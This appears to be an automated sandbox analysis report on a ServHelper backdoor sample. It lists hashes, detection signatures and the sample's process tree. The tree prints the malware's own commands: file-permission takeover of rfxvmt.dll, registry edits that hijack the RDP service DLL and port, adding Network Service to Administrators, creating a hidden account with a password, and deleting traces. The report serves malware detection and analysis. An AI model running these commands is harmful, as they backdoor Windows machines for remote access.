Analysis
-
max time kernel
148s -
max time network
164s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
02-05-2022 15:34
Static task
static1
Behavioral task
behavioral1
Sample
00d5e412b5291821d1d494e993d6df45002cdedb9c750e4133f73ec6a67653ee.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
00d5e412b5291821d1d494e993d6df45002cdedb9c750e4133f73ec6a67653ee.exe
Resource
win10v2004-20220414-en
General
-
Target
00d5e412b5291821d1d494e993d6df45002cdedb9c750e4133f73ec6a67653ee.exe
-
Size
3.2MB
-
MD5
92a57e8a84eb3be8af9c64753c30781b
-
SHA1
bd0717580833a366d3c2b4f8b368095714c4c98d
-
SHA256
00d5e412b5291821d1d494e993d6df45002cdedb9c750e4133f73ec6a67653ee
-
SHA512
dd3bcb529dfaab3470c62ee263cef66a3675cd3375d6f8b043b67f2a22564f86d0318c4fc79ad87e0579d2ceff93677745fecdab926141d5687ee3b5cb5753c2
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
pid Process 2164 icacls.exe 1556 icacls.exe 1820 icacls.exe 3132 icacls.exe 1732 icacls.exe 3984 icacls.exe 524 takeown.exe 3348 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral2/files/0x00070000000231d5-173.dat upx behavioral2/files/0x00070000000231d6-174.dat upx -
Loads dropped DLL 2 IoCs
pid Process 1028 Process not Found 1028 Process not Found -
Modifies file permissions 1 TTPs 8 IoCs
pid Process 3984 icacls.exe 524 takeown.exe 3348 icacls.exe 2164 icacls.exe 1556 icacls.exe 1820 icacls.exe 3132 icacls.exe 1732 icacls.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\shellbrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4320 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 3432 powershell.exe 3432 powershell.exe 2948 powershell.exe 2948 powershell.exe 3008 powershell.exe 3008 powershell.exe 424 powershell.exe 424 powershell.exe 3432 powershell.exe 3432 powershell.exe 3432 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 644 Process not Found -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3432 powershell.exe Token: SeDebugPrivilege 2948 powershell.exe Token: SeDebugPrivilege 3008 powershell.exe Token: SeDebugPrivilege 424 powershell.exe Token: SeRestorePrivilege 2164 icacls.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2604 wrote to memory of 3432 2604 00d5e412b5291821d1d494e993d6df45002cdedb9c750e4133f73ec6a67653ee.exe 81 PID 2604 wrote to memory of 3432 2604 00d5e412b5291821d1d494e993d6df45002cdedb9c750e4133f73ec6a67653ee.exe 81 PID 3432 wrote to memory of 4760 3432 powershell.exe 85 PID 3432 wrote to memory of 4760 3432 powershell.exe 85 PID 4760 wrote to memory of 4600 4760 csc.exe 86 PID 4760 wrote to memory of 4600 4760 csc.exe 86 PID 3432 wrote to memory of 2948 3432 powershell.exe 87 PID 3432 wrote to memory of 2948 3432 powershell.exe 87 PID 3432 wrote to memory of 3008 3432 powershell.exe 89 PID 3432 wrote to memory of 3008 3432 powershell.exe 89 PID 3432 wrote to memory of 424 3432 powershell.exe 91 PID 3432 wrote to memory of 424 3432 powershell.exe 91 PID 3432 wrote to memory of 524 3432 powershell.exe 97 PID 3432 wrote to memory of 524 3432 powershell.exe 97 PID 3432 wrote to memory of 3348 3432 powershell.exe 98 PID 3432 wrote to memory of 3348 3432 powershell.exe 98 PID 3432 wrote to memory of 2164 3432 powershell.exe 99 PID 3432 wrote to memory of 2164 3432 powershell.exe 99 PID 3432 wrote to memory of 1556 3432 powershell.exe 100 PID 3432 wrote to memory of 1556 3432 powershell.exe 100 PID 3432 wrote to memory of 1820 3432 powershell.exe 101 PID 3432 wrote to memory of 1820 3432 powershell.exe 101 PID 3432 wrote to memory of 3132 3432 powershell.exe 102 PID 3432 wrote to memory of 3132 3432 powershell.exe 102 PID 3432 wrote to memory of 1732 3432 powershell.exe 103 PID 3432 wrote to memory of 1732 3432 powershell.exe 103 PID 3432 wrote to memory of 3984 3432 powershell.exe 104 PID 3432 wrote to memory of 3984 3432 powershell.exe 104 PID 3432 wrote to memory of 2172 3432 powershell.exe 105 PID 3432 wrote to memory of 2172 3432 powershell.exe 105 PID 3432 wrote to memory of 4320 3432 powershell.exe 106 PID 3432 wrote to memory of 4320 3432 powershell.exe 106 PID 3432 wrote to memory of 4208 3432 powershell.exe 107 PID 3432 wrote to memory of 4208 3432 powershell.exe 107 PID 3432 wrote to memory of 4840 3432 powershell.exe 110 PID 3432 wrote to memory of 4840 3432 powershell.exe 110 PID 4840 wrote to memory of 3764 4840 net.exe 111 PID 4840 wrote to memory of 3764 4840 net.exe 111 PID 3432 wrote to memory of 588 3432 powershell.exe 112 PID 3432 wrote to memory of 588 3432 powershell.exe 112 PID 588 wrote to memory of 4552 588 cmd.exe 113 PID 588 wrote to memory of 4552 588 cmd.exe 113 PID 4552 wrote to memory of 4872 4552 cmd.exe 114 PID 4552 wrote to memory of 4872 4552 cmd.exe 114 PID 4872 wrote to memory of 2312 4872 net.exe 115 PID 4872 wrote to memory of 2312 4872 net.exe 115 PID 3432 wrote to memory of 3244 3432 powershell.exe 116 PID 3432 wrote to memory of 3244 3432 powershell.exe 116 PID 3244 wrote to memory of 1568 3244 cmd.exe 117 PID 3244 wrote to memory of 1568 3244 cmd.exe 117 PID 1568 wrote to memory of 2280 1568 cmd.exe 118 PID 1568 wrote to memory of 2280 1568 cmd.exe 118 PID 2280 wrote to memory of 5024 2280 net.exe 119 PID 2280 wrote to memory of 5024 2280 net.exe 119 PID 1908 wrote to memory of 2040 1908 cmd.exe 123 PID 1908 wrote to memory of 2040 1908 cmd.exe 123 PID 2040 wrote to memory of 3520 2040 net.exe 124 PID 2040 wrote to memory of 3520 2040 net.exe 124 PID 3432 wrote to memory of 2324 3432 powershell.exe 127 PID 3432 wrote to memory of 2324 3432 powershell.exe 127 PID 3432 wrote to memory of 5080 3432 powershell.exe 128 PID 3432 wrote to memory of 5080 3432 powershell.exe 128 PID 2604 wrote to memory of 3880 2604 cmd.exe 129 PID 2604 wrote to memory of 3880 2604 cmd.exe 129
Processes
-
C:\Users\Admin\AppData\Local\Temp\00d5e412b5291821d1d494e993d6df45002cdedb9c750e4133f73ec6a67653ee.exe"C:\Users\Admin\AppData\Local\Temp\00d5e412b5291821d1d494e993d6df45002cdedb9c750e4133f73ec6a67653ee.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2604 -
\??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3432 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tk0lz5qv\tk0lz5qv.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES499C.tmp" "c:\Users\Admin\AppData\Local\Temp\tk0lz5qv\CSC786B87BE5C0D432DA48B5D2F9281BBDB.TMP"4⤵PID:4600
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:424
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:524
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3348
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2164
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1556
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1820
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3132
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1732
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3984
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2172
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:4320
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:4208
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:3764
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:4872 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2312
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:5024
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2324
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:5080
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:3520
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc ap4XQy78 /add1⤵
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc ap4XQy78 /add2⤵PID:3880
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc ap4XQy78 /add3⤵PID:2000
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
54KB
MD55f612d9087b8bcadb4002e6b026990e8
SHA1b5f343e569abb0849c06e3d77d00cc1bd2d5f589
SHA256838be164025509d2c4dd005aabf7bbca522b703e931d9c21fb287b5f06178450
SHA512d5e3e0eeb9b4d3f7ceeba19bc83669258d77d6f973e90049d8cb2796e3f0f6502209e1863ba0a0c7d69b1cc3c0a43e74b9efd0557854ac349f3ffc51d6ea1c59
-
Filesize
1KB
MD599195de0f356a9878ca023dae34fc951
SHA1a5a250fc1fc323d05a67ebc0bdf74b22f84369ee
SHA256f89ec4588fab272d85259c4d0e14b7df2237d980d6f3c73beee99f697686e8e5
SHA512918b616f19cff4c9705bb3033cc0d2c6dbe2634bd53df99a171fd21137126044f2d3f49cc2aa41f5dbbf52e6da8f1fba22ddd854e89b91a612ac18b5c97856df
-
Filesize
3.0MB
MD54cbfa161c9ce114d4b772988ef9f8255
SHA128178e575804a3c97434bca53111cab82546be38
SHA256ef297ff9ad64d966e8c977fd8272523f69e73309ed6886b33a8e6e5801e49610
SHA512d89b9eed47c5396983a7b08999b925d105414f9d7aedbcdfb3a2f081eb7f326838a56221883ce3f68b376172c7339878f3a9b24e601cc002be7887ae91371496
-
Filesize
3KB
MD585d35866a874694ec12c8c2c9761e406
SHA16f07e750c70dffd2fdb12430a734f995a8b87217
SHA25679988b1479715c400679aa33c82e94c58d490e784fffe9e50724ce7c7473437c
SHA512b7b35aa66541eb2cde268f35d26f636e43a3e63ff909e7ebc32de3da094905868e0d92d6316a099a6bf6a6f5fd894fa8fc0de3e8908a8554d49ee17f274200ce
-
Filesize
54KB
MD51421ddee54c79131b2374145ebb753c3
SHA114542c04f9ae76fbc1d815199a36df294a97b2ef
SHA256c541a6864196f87b07d9f34622eb2f8571da74909b80df872636bb0b3268f579
SHA51234d70b20959fe6cca4caa633194cb0e94ac226bce2613bed867ad117707095a67dddf1ea12c63533a44d2bdfbff96f788cf0007b7d90e9b4efc691e925ef93ce
-
Filesize
943KB
MD5ba5050b652ce33ba7bb49c0142d8a47f
SHA1497000e9e6ba50077b3e5a24a8301428b84cfdc7
SHA256312d92923a48b780e6719b684f4c472e2d4d966c06d48170162a24f84f5058b0
SHA512bde68a7bc0c9827fbdc4757b13eca5e79d735fda7f6d0be78a92c7cc819dd2609685abeceacfbf3ef56fc25858e9f476fe6b5961600f5911a97b2116733df1e8
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
Filesize
652B
MD5968ec85aea720b79c06c748ae1c1fda7
SHA1b88140bf5d123bd18aa5ff8f8f54a643c5ee531c
SHA2568b3cba07e6708905b70e9f504d0d8f024ff9340d1deb3f36e6553032a1b49c72
SHA5127b4a7c9556e038dc4d063e3e24b0caf69528b491801e95f85c5e69d7fd4548dd4b76d33abdbde4154d01dd141cd24dfb02e002cc04e84c8468d1261066bf648a
-
Filesize
504B
MD58e55cb0ca998472ab6d3e295e0c4dd50
SHA1407d07a29b89fc3afc246c0680d5857e3f51019d
SHA25663e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685
SHA512c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28
-
Filesize
369B
MD53163edac47e00e35a8b84980dc30dcf9
SHA14473b7af681509e75ba3bd05c121a198ddba1548
SHA256b1a0f97ad5e1252d81ab8b30b4cec078d02cf7fbb359e285300228d8301a16f0
SHA5123aac3df56007f2fc719bbb1ed0f46ea49557509bd52a039d3403c56158739232a241c3aac154f3b7bb6bd7d6de58dabf6bdafb71344c6142ccba4fdb262d7f19